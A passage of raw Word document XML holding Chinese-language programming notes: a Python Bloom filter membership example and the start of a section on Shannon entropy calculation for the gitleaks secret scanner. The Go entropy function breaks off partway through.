          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>BloomFilter(capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="056DE8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3BF78F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>'www.baidu.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269511C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>add(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7B731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B999B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>(url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960C219" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70031D69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>"www.liuqingzheng.top"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C274D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CC8D04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="769" w:name="_Toc159780192"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>熵值计算优化：香浓熵计算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="769"/>
    </w:p>
    <w:p w14:paraId="634A9656" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6584C821" wp14:editId="31FE9805">
            <wp:extent cx="1348740" cy="259080"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1348740" cy="259080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7650D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/qq_38890412/article/details/106149936</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390700CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB665A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为底数原因如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C66A5D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更复杂则熵越高，熵越大则越来复杂</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F3F6D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0F1ABF3A" wp14:editId="1026CB85">
            <wp:extent cx="2548255" cy="3399155"/>
            <wp:effectExtent l="0" t="0" r="12065" b="14605"/>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57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2548255" cy="3399155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251DE50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CA8A17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2064E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="770" w:name="_Toc159780193"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:bookmarkEnd w:id="770"/>
    </w:p>
    <w:p w14:paraId="47CBD5DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func shannonEntropy(data string) (entropy float64) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8B1D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if data == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B592D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708E5B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60A90B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5641DA7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>charCounts := make(map[rune]int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37680943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, char := range data {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3821FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>charCounts[char]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7CA7CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E227E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BDE608" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>invLength := 1.0 / float64(len(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EABD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, count := range charCounts {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82C5A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>freq := float64(count) * invLength</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE53EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
